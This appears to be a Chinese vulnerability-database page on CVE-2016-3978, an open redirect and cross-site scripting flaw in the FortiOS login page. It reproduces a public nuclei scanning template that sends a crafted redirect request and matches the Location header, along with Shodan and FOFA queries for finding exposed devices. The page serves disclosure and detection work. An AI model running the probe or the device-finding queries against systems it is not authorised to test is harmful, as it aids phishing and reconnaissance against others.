CVE-2016-3978: Fortinet FortiOS - Open Redirect/Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Fortinet FortiOS | POC: 已公开

漏洞描述

FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login."

PoC代码[已公开]

id: CVE-2016-3978

info:
  name: Fortinet FortiOS  - Open Redirect/Cross-Site Scripting
  author: 0x_Akoko
  severity: medium
  description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login."
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, phishing attacks, and potential data theft.
  remediation: |
    Apply the latest security patches and updates provided by Fortinet to mitigate the vulnerability.
  reference:
    - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2016-3978
    - http://seclists.org/fulldisclosure/2016/Mar/68
    - http://www.securitytracker.com/id/1035332
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-3978
    cwe-id: CWE-79
    epss-score: 0.05549
    epss-percentile: 0.89913
    cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fortinet
    product: fortios
    shodan-query:
      - http.html:"/remote/login" "xxxxxxxx"
      - http.favicon.hash:945408572
      - cpe:"cpe:2.3:o:fortinet:fortios"
      - port:10443 http.favicon.hash:945408572
    fofa-query:
      - body="/remote/login" "xxxxxxxx"
      - icon_hash=945408572
  tags: cve2016,cve,redirect,fortinet,fortios,seclists

http:
  - method: GET
    path:
      - '{{BaseURL}}/login?redir=http://www.interact.sh'

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4a0a0047304502206141bc6a1398d56de957e2723347e28ca165300a29601bbcc6c917cee1938f9d022100a19b7dc35bfed71a0e21396b37eb8f66affb582ca3f486a9126a0550d96c155d:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2016/CVE-2016-3978.yaml

相关漏洞推荐